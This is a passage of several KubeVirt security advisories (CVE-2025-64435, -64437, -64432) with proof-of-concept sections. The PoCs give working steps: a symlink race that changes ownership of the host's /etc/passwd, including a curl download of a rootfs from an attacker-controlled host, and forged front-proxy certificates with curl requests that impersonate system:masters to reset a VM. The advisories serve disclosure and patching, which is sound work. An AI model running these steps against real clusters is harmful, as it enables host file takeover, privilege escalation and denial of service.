  vmiChanged := !equality.Semantic.DeepEqual(vmi.Status, vmiCopy.Status) || !equality.Semantic.DeepEqual(vmi.Finalizers, vmiCopy.Finalizers) || !equality.Semantic.DeepEqual(vmi.Annotations, vmiCopy.Annotations) || !equality.Semantic.DeepEqual(vmi.Labels, vmiCopy.Labels)
	if vmiChanged {
    // MK: this will detect that the phase of the VMI has changed and updated the resource
		key := controller.VirtualMachineInstanceKey(vmi)
		c.vmiExpectations.SetExpectations(key, 1, 0)
		_, err := c.clientset.VirtualMachineInstance(vmi.Namespace).Update(context.Background(), vmiCopy, v1.UpdateOptions{})
		if err != nil {
			c.vmiExpectations.LowerExpectations(key, 1, 0)
			return err
		}
	}

To trigger it, the attacker should update the fake-launcher pod's
annotations before the check
vmiPodExists := controller.PodExists(pod) && !isTempPod(pod) in sync,
and between the check if !isTempPod(pod) && controller.IsPodReady(pod)
in sync but before the patch API call in syncPodAnnotations as follows:

annotations:
    kubevirt.io/ephemeral-provisioning: "true"

The above annotation will mark the attacker pod as ephemeral (i.e.,
used to provision the VMI) and will fail the VMI as the latter is
already running (provisioning happens before the VMI starts running).

The update should also happen during the reconciliation loop when the
fake-launcher pod is initially going to be associated with the VMI
and its labels, related to eviction, updated.

Upon successful exploitation the VMI is marked as failed and could
not be controlled via the Kubernetes API. However, the QEMU process
is still running and the VMI is still present in the cluster:

operator@minikube:~$ kubectl get vmi
NAME                       AGE    PHASE    IP            NODENAME   READY
launcher-label-confusion   128m   Failed   10.244.0.10   minikube   False
# The VMI is not reachable anymore 
operator@minikube:~$ virtctl console launcher-label-confusion
Operation cannot be fulfilled on virtualmachineinstance.kubevirt.io "launcher-label-confusion": VMI is in failed status

# The two pods are still associated with the VMI

operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}' 
{"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube","ca31c8de-4d14-4e47-b942-75be20fb9d96":"minikube"}

Impact

As a result, an attacker could provoke a DoS condition for the
affected VMI, compromising the availability of the services it
provides.

Severity
Moderate
5.3/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
High
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE ID
CVE-2025-64435

Weaknesses
Weakness CWE-703


Credits

    @mihailkirov mihailkirov Finder
    @Faeris95 Faeris95 Finder


_____________________________________________________________________


Isolation Detection Flaw Allows Arbitrary File Permission Changes
Moderate
stu-gott published GHSA-2r4r-5x78-mvqf Nov 6, 2025

Package
No package listed

Affected versions
1.5.0

Patched versions
None


Description

Summary

_Short summary of the problem. Make the impact and severity as clear
as possible.

It is possible to trick the virt-handler component into changing the
ownership of arbitrary files on the host node to the unprivileged
user with UID 107 due to mishandling of symlinks when determining
the root mount of a virt-launcher pod.


Details

Give all details on the vulnerability. Pointing to the incriminated
source code is very helpful for the maintainer.

In the current implementation, the virt-handler does not verify
whether the launcher-sock is a symlink or a regular file. This
oversight can be exploited, for example, to change the ownership
of arbitrary files on the host node to the unprivileged user with
UID 107 (the same user used by virt-launcher) thus, compromising
the CIA (Confidentiality, Integrity and Availability) of data on
the host.
To successfully exploit this vulnerability, an attacker should be
in control of the file system of the virt-launcher pod.


PoC

Complete instructions, including specific configuration details,
to reproduce the vulnerability.

In this demonstration, two additional vulnerabilities are combined
with the primary issue to arbitrarily change the ownership of a file
located on the host node:

    A symbolic link (launcher-sock) is used to manipulate the
interpretation of the root mount within the affected container,
effectively bypassing expected isolation boundaries.
    Another symbolic link (disk.img) is employed to alter the
perceived location of data within a PVC, redirecting it to a file
owned by root on the host filesystem.
    As a result, the ownership of an existing host file owned by
root is changed to a less privileged user with UID 107.

It is assumed that an attacker has access to a virt-launcher pod's
file system (for example, obtained using another vulnerability) and
also has access to the host file system with the privileges of the
qemu user (UID=107). It is also assumed that they can create
unprivileged user namespaces:

admin@minikube:~$ sysctl -w kernel.unprivileged_userns_clone=1

The below is inspired by an article, where the attacker constructs an
isolated environment solely using Linux namespaces and an augmented
Alpine container root file system.

# Download an container file system from an attacker-controlled location
qemu-compromised@minikube:~$ curl http://host.minikube.internal:13337/augmented-alpine.tar -o augmented-alpine.tar
# Create a directory and extract the file system in it
qemu-compromised@minikube:~$  mkdir rootfs_alpine && tar -xf augmented-alpine.tar -C rootfs_alpine
# Create a MOUNT and remapped USER namespace environment and execute a shell process in it
qemu-compromised@minikube:~$ unshare --user --map-root-user --mount sh
# Bind-mount the alpine rootfs, move into it and create a directory for the old rootfs.
# The user is root in its new USER namesapce
root@minikube:~$ mount --bind rootfs_alpine rootfs_alpine && cd rootfs_alpine && mkdir hostfs_root
# Swap the current root of the process and store the old one within a directory
root@minikube:~$ pivot_root . hostfs_root 
root@minikube:~$ export PATH=/bin:/usr/bin:/usr/sbin
# Create the directory with the same path as the PVC mounted within the `virt-launcher`. In it `virt-handler` will search for a `disk.img` file associated with a volume mount
root@minikube:~$ PVC_PATH="/var/run/kubevirt-private/vmi-disks/corrupted-pvc" && \
mkdir -p "${PVC_PATH}" && \
cd "${PVC_PATH}"
# Create the `disk.img` symlink pointing to `/etc/passwd` of the host in the old root mount directory
root@minikube:~$ ln -sf ../../../../../../../../../../../../hostfs_root/etc/passwd disk.img
# Create the socket wich will confuse the isolator detector and start listening on it
root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -

After the environment is set, the launcher-sock in the virt-launcher
container should be replaced with a symlink to
../../../../../../../../../proc/2245509/root/tmp/bad.sock (2245509
is the PID of the above isolated shell process). This should be done,
however, in a the right moment. For this demonstration, it was
decided to trigger the bug while leveraging a race condition when
creating or updating a VMI:

//pkg/virt-handler/vm.go

func (c *VirtualMachineController) vmUpdateHelperDefault(origVMI *v1.VirtualMachineInstance, domainExists bool) error {
  // ...
  //!!! MK: the change should happen here before executing the below line !!!
  isolationRes, err := c.podIsolationDetector.Detect(vmi)
		if err != nil {
			return fmt.Errorf(failedDetectIsolationFmt, err)
		}
		virtLauncherRootMount, err := isolationRes.MountRoot()
		if err != nil {
			return err
		}
		// ...

		// initialize disks images for empty PVC
		hostDiskCreator := hostdisk.NewHostDiskCreator(c.recorder, lessPVCSpaceToleration, minimumPVCReserveBytes, virtLauncherRootMount)
		// MK: here the permissions are changed
		err = hostDiskCreator.Create(vmi)
		if err != nil {
			return fmt.Errorf("preparing host-disks failed: %v", err)
		}
    // ...

The manifest of the #acr("vmi") which is going to trigger the bug is:

# The PVC will be used for the `disk.img` related bug
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: corrupted-pvc
spec:
  accessModes:
    - ReadWriteMany
  resources:
    requests:
      storage: 500Mi
---
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  labels:
  name: launcher-symlink-confusion
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio
      - name: corrupted-pvc
        disk:
          bus: virtio
      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: corrupted-pvc
    persistentVolumeClaim:
      claimName: corrupted-pvc
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

Just before the line is executed, the attacker should replace the
launcher-sock with a symlink to the bad.sock controlled by the
isolated process:

# the namespaced process controlled by the attacker has pid=2245509
qemu-compromised@minikube:~$ p=$(pgrep -af "/usr/bin/virt-launcher" | grep -v virt-launcher-monitor | awk '{print $1}') &&  ln -sf ../../../../../../../../../proc/2245509/root/tmp/bad.sock /proc/$p/root/var/run/kubevirt/sockets/launcher-sock

Upon successful exploitation, virt-launcher connects to the attacker
controlled socket, misinterprets the root mount and changes the
permissions of the host's /etc/passwd file:

# `virt-launcher` connects successfully
root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -
...
2025/05/27 17:17:35 socat[2245509] N accepting connection from AF=1 "<anon>" on AF=1 "/tmp/bad.sock"
2025/05/27 17:17:35 socat[2245509] N forked off child process 2252010
2025/05/27 17:17:35 socat[2245509] N listening on AF=1 "/tmp/bad.sock"
2025/05/27 17:17:35 socat[2252010] N reading from and writing to stdio
2025/05/27 17:17:35 socat[2252010] N starting data transfer loop with FDs [6,6] and [0,1]
PRI * HTTP/2.0

admin@minikube:~$ ls -al /etc/passwd
-rw-r--r--. 1 compromised-qemu systemd-resolve 1337 May 23 13:19 /etc/passwd

admin@minikube:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
compromised-qemu:x:107:107::/home/compromised-qemu:/bin/bash


The attacker controlling an unprivileged user can now update
the contents of the file.


Impact

What kind of vulnerability is it? Who is impacted?

This oversight can be exploited, for example, to change the
ownership of arbitrary files on the host node to the
unprivileged user with UID 107 (the same user used by
virt-launcher) thus, compromising the CIA (Confidentiality,
Integrity and Availability) of data on the host.


Severity
Moderate
5.0/ 10

CVSS v3 base metrics
Attack vector
Local
Attack complexity
High
Privileges required
High
User interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L

CVE ID
CVE-2025-64437

Weaknesses
Weakness CWE-59

Credits

    @mihailkirov mihailkirov Finder
    @Faeris95 Faeris95 Finder

_____________________________________________________________________


Authentication Bypass in Kubernetes Aggregation Layer
Moderate
stu-gott published GHSA-38jw-g2qx-4286 Nov 6, 2025

Package
No package listed

Affected versions
1.5.0

Patched versions
None


Description

Summary

_Short summary of the problem. Make the impact and severity as clear
as possible.

A flawed implementation of the Kubernetes aggregation layer's
authentication flow could enable bypassing RBAC controls.
Details

Give all details on the vulnerability. Pointing to the incriminated
source code is very helpful for the maintainer.

It was discovered that the virt-api component fails to correctly
authenticate the client when receiving API requests over mTLS. In
particular, it fails to validate the CN (Common Name) field in the
received client TLS certificates against the set of allowed values
defined in the extension-apiserver-authentication configmap.

The Kubernetes API server proxies received client requests through a
component called aggregator (part of K8S's API server), and
authenticates to the virt-api server using a certificate signed by
the CA specified via the --requestheader-client-ca-file CLI flag.
This CA bundle is primarily used in the context of aggregated API
servers, where the Kubernetes API server acts as a trusted front-end
proxy forwarding requests.

While this is the most common use case, the same CA bundle can also
support less common scenarios, such as issuing certificates to
authenticating front-end proxies. These proxies can be deployed by
organizations to extend Kubernetes' native authentication mechanisms
or to integrate with existing identity systems
(e.g., LDAP, OAuth2, SSO platforms). In such cases, the Kubernetes
API server can trust these external proxies as legitimate
authenticators, provided their client certificates are signed by
the same CA as the one defined via --requestheader-client-ca-file.
Nevertheless, these external authentication proxies are not supposed
to directly communicate with aggregated API servers.

Thus, by failing to validate the CN field in the client TLS
certificate, the virt-api component may allow an attacker to bypass
existing RBAC controls by directly communicating with the aggregated
API server, impersonating the Kubernetes API server and its
aggregator component.

However, two key prerequisites must be met for successful
exploitation:

    The attacker must possess a valid front-end proxy certificate
signed by the trusted CA (requestheader-client-ca-file). For example,
they can steal the certificate material by compromising a front-end
proxy or they could obtain a bundle by exploiting a poorly configured
and managed PKI system.

    The attacker must have network access to the virt-api service,
such as via a compromised or controlled pod within the cluster.

These conditions significantly reduce the likelihood of exploitation.
In addition, the virt-api component acts as a sub-resource server,
meaning it only handles requests for specific resources and
sub-resources . The handled by it requests are mostly related to the
lifecycle of already existing resources.

Nonetheless, if met, the vulnerability could be exploited by a
Pod-Level Attacker to escalate privileges, and manipulate existing
virtual machine workloads potentially leading to violation of their
CIA (Confidentiality, Integrity and Availability).


PoC

Complete instructions, including specific configuration details,
to reproduce the vulnerability.


Bypassing authentication

In this section, it is demonstrated how an attacker could use a
certificate with a different CN field to bypass the
authentication of the aggregation layer and perform arbitrary
API sub-resource requests to the virt-api server.

The kube-apiserver has been launched with the following CLI flags:

admin@minikube:~$ kubectl -n kube-system describe pod kube-apiserver-minikube | grep Command -A 28
    Command:
      kube-apiserver
      --advertise-address=192.168.49.2
      --allow-privileged=true
      --authorization-mode=Node,RBAC
      --client-ca-file=/var/lib/minikube/certs/ca.crt
      --enable-admission-plugins=NamespaceLifecycle,LimitRanger,ServiceAccount,DefaultStorageClass,DefaultTolerationSeconds,NodeRestriction,MutatingAdmissionWebhook,ValidatingAdmissionWebhook,ResourceQuota
      --enable-bootstrap-token-auth=true
      --etcd-cafile=/var/lib/minikube/certs/etcd/ca.crt
      --etcd-certfile=/var/lib/minikube/certs/apiserver-etcd-client.crt
      --etcd-keyfile=/var/lib/minikube/certs/apiserver-etcd-client.key
      --etcd-servers=https://127.0.0.1:2379
      --kubelet-client-certificate=/var/lib/minikube/certs/apiserver-kubelet-client.crt
      --kubelet-client-key=/var/lib/minikube/certs/apiserver-kubelet-client.key
      --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
      --proxy-client-cert-file=/var/lib/minikube/certs/front-proxy-client.crt
      --proxy-client-key-file=/var/lib/minikube/certs/front-proxy-client.key
      --requestheader-allowed-names=front-proxy-client
      --requestheader-client-ca-file=/var/lib/minikube/certs/front-proxy-ca.crt
      --requestheader-extra-headers-prefix=X-Remote-Extra-
      --requestheader-group-headers=X-Remote-Group
      --requestheader-username-headers=X-Remote-User
      --secure-port=8443
      --service-account-issuer=https://kubernetes.default.svc.cluster.local
      --service-account-key-file=/var/lib/minikube/certs/sa.pub
      --service-account-signing-key-file=/var/lib/minikube/certs/sa.key
      --service-cluster-ip-range=10.96.0.0/12
      --tls-cert-file=/var/lib/minikube/certs/apiserver.crt
      --tls-private-key-file=/var/lib/minikube/certs/apiserver.key

By default, Minikube generates a self-signed CA certificate (var/lib/minikube/certs/front-proxy-ca.crt) and use it to sign the certificate used by the aggregator (/var/lib/minikube/certs/front-proxy-client.crt):

# inspect the self-signed front-proxy-ca certificate
admin@minikube:~$ openssl x509 -text -in  /var/lib/minikube/certs/front-proxy-ca.crt | grep -e "Issuer:" -e "Subject:"
        Issuer: CN = front-proxy-ca
        Subject: CN = front-proxy-ca
# inspect the front-proxy-client certificate signed with the above cert
$ openssl x509 -text -in  /var/lib/minikube/certs/front-proxy-client.crt | grep -e "Issuer:" -e "Subject:"
        Issuer: CN = front-proxy-ca
        Subject: CN = front-proxy-client

One can also inspect the contents of the
extension-apiserver-authentication ConfigMap which is used as a
trust anchor by all extension API servers:

admin@minikube:~$ kubectl -n kube-system describe configmap
extension-apiserver-authentication


Name:         extension-apiserver-authentication
Namespace:    kube-system
Labels:       <none>
Annotations:  <none>

Data
====
requestheader-client-ca-file:
----
-----BEGIN CERTIFICATE-----
MIIDETCCAfmgAwIBAgIIN59KhbrmeJkwDQYJKoZIhvcNAQELBQAwGTEXMBUGA1UE
AxMOZnJvbnQtcHJveHktY2EwHhcNMjUwNTE4MTQzMTI3WhcNMzUwNTE2MTQzNjI3
WjAZMRcwFQYDVQQDEw5mcm9udC1wcm94eS1jYTCCASIwDQYJKoZIhvcNAQEBBQAD
ggEPADCCAQoCggEBALOFlqbM1h3uhTdU9XBZQ6AX8S7M0nT5SgSOSItJrVwjNUv/
t4FAQxnGPW7fhp9A9CeQ92DGLXkm88fgHCgnPJuodKgX8fS7NHfswvXKkgo6C4UO
2AmW0NAkuKMyTmf1tWugot7hj3sGFfIzVSLL73wm1Ci8unTaGKZG01ZZalL1kzz9
ObpmEn7DQvSJd7m5gALP4KPJdkFjoagMI4UlIownARl0h2DX5WAKy0ynGfEBvw+P
hEbuVPb+egeUVTn9/4JIqdUw21tUQrmbQqPib8BByueiOYqEerGxZDpLAxh230VG
Q6omoyUHjE6SIMBoUnAqAdLbTElVbLWJawlLZzECAwEAAaNdMFswDgYDVR0PAQH/
BAQDAgKkMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFPjiIeJVR7zQBCkpmkEa
I+70PxA8MBkGA1UdEQQSMBCCDmZyb250LXByb3h5LWNhMA0GCSqGSIb3DQEBCwUA
A4IBAQBiNTe9Sdv9RnKqTyt+Xj0NJrScVOiWPb9noO5XSyBtOy8F8b+ZWAtzc+eI
G/g6hpiT7lq3hVtmDNiE6nsP3tywXf0mgg7blRC0l3DxGtSzJZlbahAI4/U5yen7
orKiWiD/ObK2rGbt1toVRyvJzPi3hYjh4mA6GMyFbOC6snopNyM9oj+b/EuTCavf
l9WTNn2ZZQ1nYfJsLjOY5k/VtpZw1D/QwYt0u/A83RxEeBvK2aZPsq/nA0jqeHhe
VHauDQslkjMw0yrFc1b+Ju4Ly+BwH+Mi7ALUINc8EVncWZyM2L7B4N9XwPSp6YPX
fZnj69fu0JWfrq88M+LnKOyfkqi4
-----END CERTIFICATE-----


requestheader-extra-headers-prefix:
----
["X-Remote-Extra-"]

requestheader-group-headers:
----
["X-Remote-Group"]

requestheader-username-headers:
----
["X-Remote-User"]

client-ca-file:
----
-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTI1MDQxMTE3MzM1N1oXDTM1MDQxMDE3MzM1N1owFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALXK
ShgBkCDLETxDOSknvWHr7lfnvLtSCLf3VPVwFQNDhLAuFBc2H1MSMqzW6hcyxAVA
arQbOe36zxHjHpaP3VlGOEw3CVesPNw6ZToGuhpRq1inQATzeg2yc5w1jtRjLXhb
BWp7zCDk1qoHws/fWpaWOe3oQq4ZOA1+bJDsmZ7LjmMtOKHdqftEFz/RGVrn7nKD
/WXyGgKgSSNFsDK+Ow6gN6r3b10S82VQ5MwncJuqGO1r036yjwWBU8PEpknc/MhG
J/bMdI/w49rxlEAE92OadYRNvC0SDhG0HyPj9BMVx8ZG5X28lZMgq98UzVgu9Try
e8tndHqxUaU7rjO7j/8CAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBS8FpfTfvGkXDPJEXUoTQs+MwVhPjANBgkqhkiG9w0BAQsFAAOCAQEAFg+gxZ7W
zZValzuoXSc3keutB4U0QXFzjOhTVo8D/qsBNkxasdsrYjF2Do/KuGxCefXRZbTe
QWX3OFhiiabd0nkGoNTxXoPqwOJHczk+bo8L2Vcva1JAi/tBVNkPULzZilZWgWQz
8d8NgABP7MpHnOJVvAr6BEaS1wpoLzyEMXm6YToZXjDX1ajzyyLonQ9So1Y7aj6v
yPQ8OO2TUhkEpzb28/s5Pr33QT8W0/FX3m8+MGSNvWdHNZ+UzXLk3iSfySgjmciZ
o4C5yKLZgKFxoFBxY25emr6QDZW+3HicZj6sPsblGlvlBF5wQgF65msgjvmRfTLq
JPwzd6yDCMUuZQ==
-----END CERTIFICATE-----


requestheader-allowed-names:
----
["front-proxy-client"]


BinaryData
====

Events:  <none>

It is assumed that an attacker has obtained access to a Kubernetes
pod and could communicate with virt-api reachable at 10.244.0.6.

root@compromised-pod:~$ curl -ks https://10.244.0.6:8443/ | jq .
{
  "paths": [
    "/apis",
    "/openapi/v2",
    "/apis/subresources.kubevirt.io",
    "/apis/subresources.kubevirt.io/v1",
    "/apis/subresources.kubevirt.io",
    "/apis/subresources.kubevirt.io/v1alpha3"
  ]
}

The virt-api service has two types of endpoints -- authenticated and non-authenticated:

// pkg/authorizer/authorizer.go

var noAuthEndpoints = map[string]struct{}{
	"/":           {},
	"/apis":       {},
	"/healthz":    {},
	"/openapi/v2": {},
	// Although KubeVirt does not publish v3, Kubernetes aggregator controller will
	// handle v2 to v3 (lossy) conversion if KubeVirt returns 404 on this endpoint
	"/openapi/v3": {},
	// The endpoints with just the version are needed for api aggregation discovery
	// Test with e.g. kubectl get --raw /apis/subresources.kubevirt.io/v1
	"/apis/subresources.kubevirt.io/v1":               {},
	"/apis/subresources.kubevirt.io/v1/version":       {},
	"/apis/subresources.kubevirt.io/v1/guestfs":       {},
	"/apis/subresources.kubevirt.io/v1/healthz":       {},
	"/apis/subresources.kubevirt.io/v1alpha3":         {},
	"/apis/subresources.kubevirt.io/v1alpha3/version": {},
	"/apis/subresources.kubevirt.io/v1alpha3/guestfs": {},
	"/apis/subresources.kubevirt.io/v1alpha3/healthz": {},
	// the profiler endpoints are blocked by a feature gate
	// to restrict the usage to development environments
	"/start-profiler": {},
	"/stop-profiler":  {},
	"/dump-profiler":  {},
	"/apis/subresources.kubevirt.io/v1/start-cluster-profiler":       {},
	"/apis/subresources.kubevirt.io/v1/stop-cluster-profiler":        {},
	"/apis/subresources.kubevirt.io/v1/dump-cluster-profiler":        {},
	"/apis/subresources.kubevirt.io/v1alpha3/start-cluster-profiler": {},
	"/apis/subresources.kubevirt.io/v1alpha3/stop-cluster-profiler":  {},
	"/apis/subresources.kubevirt.io/v1alpha3/dump-cluster-profiler":  {},
}

Each endpoint which is not in this list is considered an authenticated
endpoint and requires a valid client certificate to be presented by
the caller.

# trying to reach an API endpoint not in the above list would require client authentication
attacker@compromised-pod:~$ curl -ks https://10.244.0.6:8443/v1
request is not authenticated

To illustrate the vulnerability and attack scenario, below is
generated a certificate signed by the front-proxy-ca but issued
to an entity which is different than front-proxy-client (i.e the
certificate has a different CN). Later on, it is assumed that
the attacker has obtained access to the certificate bundle:

attacker@compromised-pod:~$ openssl ecparam -genkey -name prime256v1 -noout -out rogue-front-proxy.key
attacker@compromised-pod:~$ openssl req -new -key rogue-front-proxy.key -out rogue-front-proxy.csr -subj "/CN=crypt0n1t3/O=Quarkslab/C=Fr"
attacker@compromised-pod:~$ openssl x509 -req -in rogue-front-proxy.csr -CA front-proxy-ca.crt -CAkey front-proxy-ca.key -CAcreateserial -out
 rogue-front-proxy.crt -days 365

The authentication will now succeed:

attacker@compromised-pod:~$ curl -ks --cert rogue-front-proxy.crt --key rogue-front-proxy.key  https://10.244.0.6:8443/v1
a valid user header is required for authorization

To fully exploit the vulnerability, the attacker must also
provide valid authentication HTTP headers:

attacker@compromised-pod:~$ curl -ks --cert rogue-front-proxy.crt --key rogue-front-proxy.key  -H 'X-Remote-User:system:kube-aggregator' -H '
X-Remote-Group: system:masters' https://10.244.0.6:8443/v1
unknown api endpoint: /subresource.kubevirt.io/v1

The virt-api is a sub-resource extension server - it handles
only requests for specific resources and sub-resources (requests
having URIs prefixed with /apis/subresources.kubevirt.io/v1/).
In reality, most of the requests that it accepts are actually
executed by the virt-handler component and are related to the
lifecycle of a VM.

Hence, virt-handler's API can be seen as aggregated within
virt-api's API which in turn transforms it into a proxy.

The endpoints which are handled by virt-api are listed in the
Swagger definitions available on GitHub @openapi-spec.


Resetting a Virtual Machine Instance

Consider the following deployed VirtualMachineInstance (VMI)
within the default namespace:

apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  namespace: default
  name: mishandling-common-name-in-certificate-default
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio

      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

An attacker with a stolen external authentication proxy certificate
could easily reset (hard reboot), freeze, or remove volumes from
the virtual machine.

root@compromised-pod:~$ curl -ki --cert rogue-front-proxy.crt --key rogue-front-proxy.key  -H 'X-Remote-User: system:kube-aggregator' -H 'X-Remote-Group: system:masters' https://10.244.0.6:8443/apis/subresources.kubevirt.io/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-default/reset -XPUT

HTTP/1.1 200 OK
Date: Sun, 18 May 2025 16:43:26 GMT
Content-Length: 0


Impact

What kind of vulnerability is it? Who is impacted?

The virt-api component may allow an attacker to bypass existing
RBAC controls by directly communicating with the aggregated API
server, impersonating the Kubernetes API server and its aggregator
component.


Severity
Moderate
4.7/ 10

CVSS v3 base metrics
Attack vector
Local
Attack complexity
High
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE ID
CVE-2025-64432

Weaknesses
Weakness CWE-287


Credits

    @mihailkirov mihailkirov Finder
    @Faeris95 Faeris95 Finder


_____________________________________________________________________


Improper TLS Certificate Management Handling Allows API Identity
Spoofing
Moderate
stu-gott published GHSA-ggp9-c99x-54gp Nov 6, 2025

Package
No package listed

Affected versions
<= 1.5.3, <= 1.6.1, 1.7.0

Patched versions
None


Description

Summary

Due to improper TLS certificate management, a compromised
virt-handler could impersonate virt-api by using its own TLS
credentials, allowing it to initiate privileged operations against
another virt-handler.


Details

Give all details on the vulnerability. Pointing to the incriminated
source code is very helpful for the maintainer.

Because of improper TLS certificate management, a compromised
virt-handler instance can reuse its TLS bundle to impersonate
virt-api, enabling unauthorized access to VM lifecycle operations
on other virt-handler nodes.

The virt-api component acts as a sub-resource server, and it proxies
API VM lifecycle requests to virt-handler instances.
The communication between virt-api and virt-handler instances is
secured using mTLS. The former acts as a client while the latter as
the server. The client certificate used by virt-api is defined in
the source code as follows and have the following properties:

//pkg/virt-api/api.go

const (
	...
	defaultCAConfigMapName     = "kubevirt-ca"
  ...
	defaultHandlerCertFilePath = "/etc/virt-handler/clientcertificates/tls.crt"
	defaultHandlerKeyFilePath  = "/etc/virt-handler/clientcertificates/tls.key"
)

# verify virt-api's certificate properties from the docker container in which it is deployed using Minikube
admin@minikube:~$ openssl x509 -text -in \ 
$(CID=$(docker ps --filter 'Name=virt-api' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 127940157512425330 (0x1c688e539091f72)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler

The virt-handler component verifies the signature of client
certificates using a self-signed root CA. This latter is
generated by virt-operator when the KubeVirt stack is deployed
and it is stored within a ConfigMap in the kubevirt namespace.
This configmap is used as a trust anchor by all virt-handler
instances to verify client certificates.

# inspect the self-signed root CA used to sign virt-api and
virt-handler's certificates
admin@minikube:~$ kubectl -n kubevirt get configmap kubevirt-ca -o jsonpath='{.data.ca-bundle}' | openssl x509 -text | grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 319368675363923930 (0x46ea01e3f7427da)
Issuer: CN=kubevirt.io@1747579138
Subject: CN=kubevirt.io@1747579138

The kubevirt-ca is also used to sign the server certificate
which is used by a virt-handler instance:

admin@minikube:~$ openssl x509 -text -in \ 
$(CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "servercertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"

# the virt-handler's server ceriticate is issued by the same root CA
Serial Number: 7584450293644921758 (0x6941615ba1500b9e)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:node:virt-handler

In addition to the validity of the signature, the virt-handler
component also verifies the CN field of the presented
certificate:

<code.sec.SetupTLSForVirtHandlerServer>

//pkg/util/tls/tls.go

func SetupTLSForVirtHandlerServer(caManager ClientCAManager, certManager certificate.Manager, externallyManaged bool, clusterConfig *virtconfig.ClusterConfig) *tls.Config {
	// #nosec cause: InsecureSkipVerify: true
	// resolution: Neither the client nor the server should validate anything itself, `VerifyPeerCertificate` is still executed
	
	//...
				// XXX: We need to verify the cert ourselves because we don't have DNS or IP on the certs at the moment
				VerifyPeerCertificate: func(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
					return verifyPeerCert(rawCerts, externallyManaged, certPool, x509.ExtKeyUsageClientAuth, "client")
				},
				//...
}

func verifyPeerCert(rawCerts [][]byte, externallyManaged bool, certPool *x509.CertPool, usage x509.ExtKeyUsage, commonName string) error {
